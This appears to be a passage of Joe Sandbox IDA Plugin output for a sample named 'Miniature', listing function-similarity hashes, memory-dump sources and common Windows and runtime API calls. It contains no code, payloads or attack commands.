                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 252777609-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                            • Instruction ID: da7b187df716fcd769faa7081b4805ebceecf6ebe72448991531ab0e9b96e73c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1E31D272A10105DFC718CF59D4A0A69FBA6FB49300F3486A5E45ACB252D732EEC1CBC0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 00C1CEEE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                            • Opcode ID: cbf4e0f386306b916ddec8536f00ef8729807c09f177a47cd94d12b0294e4a76
                                                                                                                                                                                                                                                                                            • Instruction ID: 3055a7d5b689af68d39eda3185eb3fa87b6a275f35b125cc8a19cf167be36495
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cbf4e0f386306b916ddec8536f00ef8729807c09f177a47cd94d12b0294e4a76
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8732AF74A442459FCB20DF59C8C4ABEB7B5EF46354F188059FC26AB251C734EE82EB90
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: LoadString
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5cb362fb99751cb98f2185cf2189038d7bd0aaf32ff1a7b82df6633395d5a6ab
                                                                                                                                                                                                                                                                                            • Instruction ID: 7c88c329abf43ab38b49f9ec5c51564d00e8348b00021114914ef9414016f3f1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cb362fb99751cb98f2185cf2189038d7bd0aaf32ff1a7b82df6633395d5a6ab
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 06D17B35A1520AEFCF14EF98C8859EDBBB5FF48310F144259E915AB291DB30AE81DF90
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 630c5b5e054bd67d0d8c422103838780b828fe2a14fa6a40cfdc944db0464ca1
                                                                                                                                                                                                                                                                                            • Instruction ID: 3bfdb7c34bf82fba6d3e97340a9037565690b4928a9ff8fad79ef5897b9c8f81
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 630c5b5e054bd67d0d8c422103838780b828fe2a14fa6a40cfdc944db0464ca1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8451D635E10108EFDB11DF68D841BAA7BA1EB85364F19856CF8189B391D732AE43CB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 00C7FCCE
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 109dc92c10a4ab02005ced7afd641207f4d2a9da7508aaa5d25b0f04265db2b0
                                                                                                                                                                                                                                                                                            • Instruction ID: d0a0f71181f6091d3c4f58d6f021df8868b6165027dce6396039cd8a707b579a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 109dc92c10a4ab02005ced7afd641207f4d2a9da7508aaa5d25b0f04265db2b0
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8441B672500209AFDB21EFA8C8819AEB7F9EF54314B20853EE51697251EB70DF45DB50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C1668B,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C1664A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00C1665C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C1663E: FreeLibrary.KERNEL32(00000000,?,?,00C1668B,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C1666E
                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C166AB
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C16607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00C55657,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C16610
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C16607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00C16622
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C16607: FreeLibrary.KERNEL32(00000000,?,?,00C55657,?,?,00C162FA,?,00000001,?,?,00000000), ref: 00C16635
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2bd9b3a527911f2c71ffdcfa432f73445c29cd139720cff49ebd7a4cf716b15b
                                                                                                                                                                                                                                                                                            • Instruction ID: 1708984426d78e710e465c8dad615e94641d10b962df5d3090e7b590272958ed
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2bd9b3a527911f2c71ffdcfa432f73445c29cd139720cff49ebd7a4cf716b15b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA11C172600205AACB14AB20C802BED7BA59F52715F10842DF493A61C2EEB5DA85FB54
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                            • Opcode ID: e802792c99f09329da69c98b3a1ce1c6cb97cf9797fb712e724db957fdc114f8
                                                                                                                                                                                                                                                                                            • Instruction ID: 291ccbe7421e9348079eb9d59586c7c527e0f43dd2e14504df5706ad6263a373
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e802792c99f09329da69c98b3a1ce1c6cb97cf9797fb712e724db957fdc114f8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F21118B590420AAFCF05DF58E945A9E7BF4FF48310F114069FC09EB311DA31EA258B65
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C44FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00C4319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00C45031
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C453DF
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                            • Instruction ID: 3e882ac3ac192611ae40c299def0b8a3c6bcf66150563a467724d0f14cb61589
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5c7edad85fedc96dc17405c694b3f8ca8b3e31a6960b62d958f97a24a2444c6c
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2B0149B66003046BE3318F69D881A5AFBEDFB85370F65052DE59483281EB70A905C774
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                            • Instruction ID: 93f7425a445996a5af13a5401222e8a315e79ef35877ad1bcc8322ee93168b3a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: eb1dcaca3f7520121673565f353bd58828d6484f0fca4c940b7c4def7923b9e8
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9DF0C832521B2097D6323A6BAC06BDB33989F42335F100B26F965971D2EB74E90697D2
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _wcslen
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 176396367-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0e202e1a96b257e732cb852cd093bfd3ec71c09a98889d0bf34eb9e08264d460
                                                                                                                                                                                                                                                                                            • Instruction ID: 7386cb0c94547129bf5c14f087931373bd1f1219d6068de51fe8942879f3f90c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0e202e1a96b257e732cb852cd093bfd3ec71c09a98889d0bf34eb9e08264d460
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62F0CD735117046ED7149F29D806BA7BB54EB44760F50812AFA19CB1D1DB31E550DB90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 00C8F987
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 9773a2f35e9a564509c261ea564891f7b3e75c9f7502cd0c53d1ebbed8d9e368
                                                                                                                                                                                                                                                                                            • Instruction ID: 94a2fbfec4935d5c877b1cc8072c2fc324d05527b0737f0960082eea320684ac
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9773a2f35e9a564509c261ea564891f7b3e75c9f7502cd0c53d1ebbed8d9e368
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F0F08C72610204BFCB04EBA5CC46E9F7BB8EF4A724F004054F505AB260EA70AE81E760
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,00C4319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00C45031
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 166f17d60781418e7afec800919d6c8d7493ee61408e0b4852c48ffbe5e93284
                                                                                                                                                                                                                                                                                            • Instruction ID: c71624132c6ba90e773d3d2459e75018539df785f28f818c84844ebb45366fbc
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 166f17d60781418e7afec800919d6c8d7493ee61408e0b4852c48ffbe5e93284
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FBF0E23A620E20A7DB312E26DC01F5B3758BF417F0F158021B825DB0A2DA70DE019AE0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,00C36A79,?,0000015D,?,?,?,?,00C385B0,000000FF,00000000,?,?), ref: 00C43BC5
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 52792616bc5e0e2672fd5e5e12b9ec5d0f8d2e9ccaa4e9c44a20ba4a5b0865ca
                                                                                                                                                                                                                                                                                            • Instruction ID: d01fa92723bfb3a1383efeeac77fdf6412aff45041f3c156d393552f43f91e1f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52792616bc5e0e2672fd5e5e12b9ec5d0f8d2e9ccaa4e9c44a20ba4a5b0865ca
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 31E06D21250AA0A7DA2236769C02F5B7A5CFF813A0F1501A1FC7596AA1DB60CF4095E1
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                            • Opcode ID: 5cf97282f6775afe0871b074c6a73a7c112e58c907e13c5f1b9bef8efb079a33
                                                                                                                                                                                                                                                                                            • Instruction ID: 3375de2b757a83d6b7eef9ef2a8a0dd574be9ed7dc0ecdca82f1d0d7c9615f0e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5cf97282f6775afe0871b074c6a73a7c112e58c907e13c5f1b9bef8efb079a33
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 30F015B5105752CFCB349F65D8A0896BBE4AF1632A324897EE6E786610CB319884EF50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 5bc4adec7ec334e57486dbc12f6e974a56bc6e30892aa8e9a2786c13ba183fee
                                                                                                                                                                                                                                                                                            • Instruction ID: 4bcfc792d275fb5d744ec4760b561dc2ef09285b5c17e3a5e639270ff2574e6a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5bc4adec7ec334e57486dbc12f6e974a56bc6e30892aa8e9a2786c13ba183fee
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 66F02B71704200AAD7309FB5E8457B9F7E8BB11314F14461ED8E5C3281C7F254D4A761
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2638373210-0
